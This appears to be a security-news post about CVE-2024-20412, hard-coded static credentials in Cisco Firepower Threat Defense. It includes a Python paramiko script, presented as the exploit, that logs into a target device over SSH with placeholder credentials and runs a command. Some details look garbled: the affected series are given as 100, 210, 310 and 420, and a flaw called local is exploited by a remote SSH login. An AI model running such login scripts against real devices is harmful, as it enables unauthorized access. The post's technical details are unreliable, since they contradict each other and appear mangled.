CVE CyberSecurity Database News

CVE-2024-20412 - Cisco Firepower Threat Defense (FTD) Software Vulnerability: Local Access with Static Credentials

Poster -

A critical vulnerability has been discovered in Cisco Firepower Threat Defense (FTD) Software for Cisco Firepower 100, 210, 310, and 420 Series. The vulnerability, identified as CVE-2024-20412, allows an unauthenticated, local attacker to access the compromised system using static credentials. The attacker can exploit the vulnerability by logging into the CLI of the affected device using these credentials. A successful exploit might enable the attacker to access sensitive information, perform limited troubleshooting actions, modify some configuration options, or render the device unable to boot to the operating system, requiring a reimage of the device.

Vulnerability Analysis

The vulnerability occurs due to the presence of static accounts with hard-coded passwords on the affected systems. A local attacker can exploit this vulnerability by logging in to the CLI with these credentials, potentially granting them unauthorized access.

Here's a code snippet demonstrating the exploit

# Exploit for Cisco FTD CVE-2024-20412
# This script attempts to log in to the CLI of an affected device with static credentials

import paramiko

# Replace these with the correct credentials for the affected system
username = "<STATIC_USERNAME>"
password = "<STATIC_PASSWORD>"
hostname = "<TARGET_IP_ADDRESS>"

# Set up an SSH client using the Paramiko library
client = paramiko.SSHClient()
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())

# Attempt to log in with the provided static credentials
client.connect(hostname, username=username, password=password)

# If the login is successful, display a message and run some commands
print("Successfully logged in using static credentials.")
stdin, stdout, stderr = client.exec_command("show interfaces")
output = stdout.read()
print("Interfaces Details:\n", output.decode('utf-8'))

# Remember to close the SSH client when finished
client.close()

To protect your systems, users are advised to update the software to the latest version, which contains a fix for this vulnerability. You can find the update instructions and other relevant information in the following Cisco advisory:

Link to original advisory: Cisco Firepower Threat Defense Software Static Credential Vulnerability

Severity: Critical

- Affected Systems: Cisco Firepower Threat Defense Software for Cisco Firepower 100, 210, 310, and 420 Series
- Impact: Unauthorized access, retrieval of sensitive information, limited troubleshooting actions, modification of configuration options, rendering the device unable to boot

Solution: Update to the latest version of the software containing the fix for the vulnerability

Stay vigilant, and keep your systems updated to prevent potential attacks that could exploit this vulnerability.

Timeline

Published on: 10/23/2024 18:15:09 UTC
Last modified on: 11/05/2024 15:03:34 UTC